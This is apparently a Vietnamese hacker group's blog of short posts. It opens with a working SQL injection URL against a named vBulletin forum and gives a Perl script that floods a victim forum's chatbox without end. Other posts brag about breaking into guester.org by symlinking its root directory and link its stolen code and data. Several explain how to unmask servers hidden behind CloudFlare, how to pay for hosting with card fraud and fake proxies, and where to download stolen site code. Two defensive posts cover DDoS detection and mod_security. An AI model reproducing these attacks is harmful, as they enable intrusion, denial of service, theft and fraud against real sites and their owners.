http://tuoitredonganh.vn/diendan/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
[+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager fake login
[+] Md5 Hash Generator ->http://www.miraclesalad.com/webtools/md5.php
[+] Thanks to Juno-okyo & all VNHgroup members

##########################################################################################

Xem Thêm

 

Buồn buồn nghịch

_Ko có victim lên lại lôi anh đại ca ra test hehe
_Nhìn khả dụng có thể khai thác được SQL injection ;)) Nhưng một lúc ngẫm nghĩ ra thì được cái này


Xem Thêm

 

Flood ChatBox

_ He chào anh em lâu rồi ko có gì mới mẻ hum nay buồn lắm chuyện đâm ra rảnh nợ làm cái gọi là tut cho ae nghịch .....
Thấy đại ca chấm nét gì đó share code flood chatbox lên mình cũng thử flood lại ảnh xem

_ Trước tiên ae cài cái HTTP LIVE zô và get những thứ cần thiết sau
Config đúng với code mình share bên dưới nhé ;)
#!/usr/bin/env perl
# Edit By :TMT VNHgroup
# Author :TMT
# Perl flood chat box
# Site  :http://tmt-today.com
# Version: 0000 co
use LWP;
use Digest::MD5 qw(md5_hex);
use HTTP::Response;
use HTTP::Cookies;
$url="http://daica.net/4z/";                        // link victim mình muốn flood
$user="Oh!Shit";                                    // user ở diễn đàn
$pass="123456";                                   // pass
$browse = LWP::UserAgent->new();
$browse->agent('ozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0');  //config cho đúng với ff bạn đang dùng

print "[+] TMT-VNHgroup Flood Chatbox...\n";
$browse->cookie_jar({});
$response = $browse->post(
$url . 'login.php', [
'do' => 'login',
'vb_login_username' => $user,
'vb_login_password' => '',
's' =>'',
'do' => 'login',
'vb_login_md5password'=> md5_hex($pass),
'vb_login_md5password_utf'=> md5_hex($pass)

]);
for ($i=0;$i<=1000000000000000000000000000000000000000000000000000000;$i++) {
$response = $browse->post(
$url. 'misc.php', [
'do'=>'cb_postnew',
'vsacb_newmessage'=>'Test By TMT-VNHgroup',
'color'=>'grey',
'securitytoken'=>'1351080620-6931441f235974f6ed1a62fc8c4303e10589d0fe',
's'=>'',
]);
}
Save lại thành tmt.pl và Fuck thoai

Chú ý nếu nick bạn có dấu thì thêm phần này vào
Accept-Language: vi-vn,vi;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8   <-- không bị lỗi font chữ

Cho vào đâu thì tự nghĩ đi nhé ;) he he and tut
TMT-VNhgroup

Xem Thêm

 

Gọi ĐT miễn phí

Em nó đây: http://www.rebtel.com/en/landing/af/100-free-sms
Ae click vào trang web trên, sao đó click vào chữ claim offer,rùi tiếp chọn Computer nhé, điền sdt mình vào nó gửi mã đăng nhập vào đt, vậy ok rùi, gọi free nhanh nào

Xem Thêm

 

Đâm host dễ như ăn cháo

Không phải nói nhiều nhìn là hiểu
Sock trùng ccv là qua tuốt , pay die lần đầu , lần sau clear cookie, fake sock khác là qua
1 phút hosting active

Xem Thêm

 

Phát hiện và chống tấn công ddos

DDOS là một vấn đề nan giải cho các webmaster hoặc admin. Sau đây mình xin giới thiệu một vài thủ thuật để nhận biết DDOS và một số biện pháp đối phó khi server bị DDOS.

Khi server đột ngột chậm như rùa, mọi xử lý của server đều rất nặng nề, thì nhiều khả năng do một trong hoặc những nguyên nhân sau:

1. Server bị DDOS
2. Server bị quá tải do thiếu RAM
3. Server bị quá tải do tốc độ xử lý của CPU không đảm bảo
4. Tốc độ truy xuất dữ liệu của HDD không đáp ứng nhu cầu read/write của data. (Thông thường xảy ra trên các ổ SATA 72krpm hoặc HDD sắp hỏng)

Trong bài viết này chúng ta đi vào vấn đề thứ 1: server bị DDOS, các vấn đề 2,3,4 có thể khắc phục dễ dàng bằng cách nâng cấp phần cứng.

Kiểm tra xem server có bị DDOS hay không:

Từ command line Linux gõ:



netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

Câu lện trên sẽ trả về hàng loạt IP chiếm nhiều connection nhất trên server. Cần lưu ý rằng DDOS có thể xuất phát từ một lượng nhỏ connection. Do đó việc kết quả trả về connection thấp bạn vẫn có thể trong tình trạng under attack.

Một phương pháp khác:

Mã:
netstat -n | grep :80 |wc -l
 
Mã:
netstat -n | grep :80 | grep SYN |wc -l

Dòng lệnh thứ nhất trả về số lượng active connection (connection đang hoạt động). Rất nhiều kiểu tấn công DDOS bằng cách mở một kết nối connection lên server rồi không làm gì cả khiến cho server chờ đợi cho đến khi timeout. Nến nếu dòng lệnh thứ nhất trả về trên 500 thì server của bạn rất nhiều khả năng bị DDOS.

Dòng lệnh thứ 2 trả về kết quả trên 100 thì rất nhiều khả năng server bạn trong tình trang syn attack DDOS.

Lưu ý: cách tính trên chỉ là tương đối, một số website có lưu lượng truy cập lớn thì phương pháp detect này có thể không chính xác.

Một số phương pháp khắc phục:

Cách khắc phục nhanh nhất là block các IP chiếm nhiều connection nhất trong "giờ cao điểm":

Cách 1:

Mã:
route add địa-chỉ-ip reject
Ví dụ của mình cái thằng nó đang ddos VNH IP là 180.87.42.50 thì cho nó vào

Mã:
route add 180.87.42.50 reject
Kiểm tra bằng lệnh: route -n |grep địa-chỉ-ip

Cách 2: sử dụng iptables

Mã:
iptables -A INPUT 1 -s địa-chỉ-ip -j DROP/REJECT service iptables restart
Mã:
service iptables save
Sau đó xóa hết tất cả connection hiện hành và khơi động lại service httpd

Mã:
killall -KILL httpd  service httpd restart
Nếu như hoàn tất các bước nêu trên mà server vẫn chậm thì có nghĩa là vấn đề bạn gặp phải nằm vào trường hợp 2,3,4... chỉ việc nâng cấp server để đáp ứng nhu cầu truy cập của người sử dụng.

Xem Thêm

 

3 Thằng nghịch

Còn 3 ngàn ngồi nét ra ku kẻ bảo fuck cái site
http://guester.org/
Thấy bảo này nọ lên đéo biết được,nói chung là nhà đang die qua đó Quậy phát xem

xem qua server thì đc vài mống , dkm chả nhẽ bó tay ?...thử bug and đoán pass loạn tử cung cũng ko ăn thua , nhưng với sự chém gió của anh thì cũng được cái ảnh này :))

Safe_mod: OFF - PHP version: 5.2.17 - cURL: ON - MySQL: ON - MSSQL: OFF - PostgreSQL: OFF - Oracle: OFF
Disable functions : Chẳng hiểu các bạn phá hoại người khác làm gì, exec, system, passthru, shell_exec, escapeshellarg, escapeshellcmd, proc_close, proc_open, dl, popen, show_source,symlink,phpinfo
Uname -a: Linux server257.guester.org 2.6.18-308.11.1.el5xen #1 SMP Tue Jul 10 09:29:47 EDT 2012 x86_64
 Cái path to tướng :x , giờ symlink root ln -s / tmt and ra cả đống này
Cái thổn gì thế ? các bạn có nhìn thấy cái gì ko ?
Code+data kìa =)) khỏi mất công zip download về cho lẹ =))
http://www.mediafire.com/?7avb9idoi8oxtia (tmt-vnhgroup)
http://www.mediafire.com/?0lfi6fo1ddykl6w
Giờ đến lượt ku juno nghịch chát box =))
TMT,kechocgianvn,Juno-okyo

3 thằng bay thật là phê :)) , à quên mấy thằng này ngu tưởng bị BUG CHATBOX , nhưng thực ra là
$config['forumlink'] = 'guester.org'; // link dien dan, ko them ky tu*. / o cuoi', ko them http:// o*? da^u`, nhieu domain thj ngan cach nhau bang dau pha^y? ,
$config['chatboxkey'] = 'breaker'; // Tu khoa' cua chatbox (phai chinh trong vbulletin options > ChangUonDyU Ex File Chatbox nu*a~ (Cai nay giup bao ve chatbox ko bj nguoi ngoai` phA')

$config['password_tools'] = 'password'; // mat khau cho file tools.php
$config['managegroup'] = "6"; // Nhom thanh vien duoc su dung cac' lenh quan ly chatbox
$config['cantban'] = "9999,1,6"; //Nhóm ID mem không bị ban
đặt cái pass value quá
$config['forumlink'] = 'guester.org'; // link dien dan, ko them ky tu*. / o cuoi', ko them http:// o*? da^u`, nhieu domain thj ngan cach nhau bang dau pha^y? ,
$config['chatboxkey'] = 'Breaker'; // Tu khoa' cua chatbox (phai chinh trong vbulletin options > ChangUonDyU Ex File Chatbox nu*a~ (Cai nay giup bao ve chatbox ko bj nguoi ngoai` phA')

$config['password_tools'] = 'tools'; // mat khau cho file tools.php
$config['managegroup'] = "10,6"; // Nhom thanh vien duoc su dung cac' lenh quan ly chatbox
$config['cantban'] = "1"; //Nhóm ID mem không bị ban
Cuối cùng 3 thằng ra về vui vẻ :)) mình nợ mẹ mất 10 ngàn :))

Xem Thêm

 

Installation Mod Security on Kloxo (CentOS5)

. Validate the packages by installing the GPG key:
rpm --import http://www.jasonlitka.com/media/RPM-GPG-KEY-jlitka
2. Add the following to your '/etc/sysconfig/rhn/sources' file:
yum utterramblings http://www.jasonlitka.com/media/EL5/$ARCH
3. Create new file :
vi /etc/yum.repos.d/utterramblings.repo
... and then paste the following into the editor:
[utterramblings]
name=Jason's Utter Ramblings Repo
baseurl=http://www.jasonlitka.com/media/EL$releasever/$basearch/
enabled=1
gpgcheck=1
gpgkey=http://www.jasonlitka.com/media/RPM-GPG-KEY-jlitka
4. Install modsecurity by typing: 
yum install mod_security
5. Restart the Apache webserver:
service httpd restart
All done!


Note that a default ruleset is included and activated during the installation. If you want to edit the configuration, the following can be useful:

/etc/httpd/conf.d: all files in this directory are loaded during Apache startup.
/etc/httpd/conf.d/mod_security.conf: default configuration loading the mod_security module and the default rule set.
/etc/httpd/modsecurity.d: default rule set.

Xem Thêm

 

CloudFlare Bypass [2-TMT]

Tình hình là vừa ngâm cứu, được ku songoku gửu cho cái diễn đàn củ chuối này bảo là của thằng nào VHB ấy quên con mẹ nó rồi

Ping thử thì lại ra thằng chym to nó bảo vệ thử các bắt kia nhưng ko có thôn tin gì .....ngồi đặt bẫy 1 lúc thì cũng bắt được con chym này , nẩy sinh từ cái fake http://cave-viet.com <-- khi face sai mail nó sẽ gửu info server về cho mình

hehe điều này có nghĩa gì ko?

Nói nhảm 1 lúc ---> reg phát cho an lành ( dùng hót meo nhé)
Cám ơn, ChymTO. Việc ghi danh của bạn đã thành công.

Bấy giờ bạn có thể bổ sung thông tin trong phần Hồ Sơ, hoặc bạn có thể điều chỉnh trong phần Chức Năng để sử dụng diễn đàn hơn. Bạn không nhất thiết phải làm bây giờ nhưng nếu sau này bạn muốn thì có thể vào phần Ðiều Chỉnh Hồ Sơ để thay đổi những thông tin bạn muốn.

Bạn có thể bấm vào đây để trở về diễn đàn.
Ok giờ check mail xem sao...tùm tèn đã có mail chào mừng :)) chết bà mày ông sắp bắt đc chym bé rồi :))

giờ view source lên ở phần

và cuối cùng ta tóm được chym bé :x


Authentication-Results: hotmail.com; sender-id=none (sender IP is 112.78.8.55[) header.from=webmaster@maze-gamevn.com; dkim=none header.d=maze-gamevn.com; x-hmca=none
X-SID-PRA: webmaster@maze-gamevn.com
X-DKIM-Result: None
X-SID-Result: None
X-AUTH-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD00
X-Message-Info: M98loaK0Lo27IVRxloyPIYugp41x7kap+1oECsaaowgX3KjSMpGPd82yGIyOEI8LD5zoD6/uYI/ascsa1Vz0loszMRbrS18sOMQYW8FsczVADByy3C9VA0SawAi5EQI1Inf8uqrJr+tnhHmqEA6LWg==
Received: from [COLOR="#FF0000"]server-112-78-8-55.domainhostingvn.com ([112.78.8.55])[/COLOR] by COL0-MC4-F36.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
     Mon, 15 Oct 2012 05:00:10 -0700
Địa chỉ cháu nó đây
/home/mazegame/public_html/@rum
And tut...TMT-VNHgroup

Xem Thêm

 

CloudFlare Bypass [TMT]


Bài này mình hướng dẫn cách lấy ip chính của mấy thằng sài DNS này , tùy vào trường hợp nếu nó login vào host để upload hay edit file thì ta mới lấy được info nhé Trước tiên vào http://toolbar.netcraft.com/site_report?url=http://www.worldofhacker.com ta được cái đống ip này
 Chúng ta để ý
IP address 199.27.134.50   đây là ip khi ta ping
Virtual servers    178.162.152.80    Linux    lighttpd/1.4.20    16-Mar-2011<-- là địa chỉ ip khi nó login để
tiếp theo đó scan bằng nmap ta được

Các bạn nhìn thấy giờ hơm , port 7777 là của koloxo vậy thử đánh
http://178.162.152.80:7778/login/ <--- ra cái gì thế :x

http://178.162.152.80  <-- chạy hẳn trên web
tiếp là reverser ip
http://ip.iuvn.net/Reverse-IP-Lookup-DNS-Domain/178.162.152.80.html

Đến đây là các bạn biết làm gì rồi đó, còn với trường hợp mà ko có "Hosting History"thì mình sẽ viết sau...and tut

TMT-VNHgroup

Xem Thêm

 

Demo Bypass ChangUonDyU

Tuy đã có tut của ku Juno nhưng đối với tut đó thì cần phải get được key để chát , nhưng trong trường hợp này là ko chát được để get key

1 demo nho nhỏ :P

http://www.mediafire.com/?88olep119kiqy1o
Victim : http://worldofhacker.com/ Mình đã bypass được và lấy được cái ip server nó :178.162.152.80

mới tập tành có gì sai sót mong ae bỏ qua :D

Xem Thêm

 

Tập tành local

video:
http://www.mediafire.com/?h3lmylp39so4w95

giúp lấy code dễ hơn :d

Xem Thêm

 

share code vietnam3g.com


Mã:

http://www.mediafire.com/?alkvr9ah61345az

pass: vnhack.us
demo : vietnam3g.com

Xem Thêm

 

share blog9x.mobi


Mã:
http://www.mediafire.com/?zcxnz689dhyd5mc
demo : blog9x.mobi
pass: vnhack.us

Xem Thêm

 

share code duatop.net

Xem Thêm

 

Copyright © 123 H4ck' Blog. Cung cấp bởi Blogger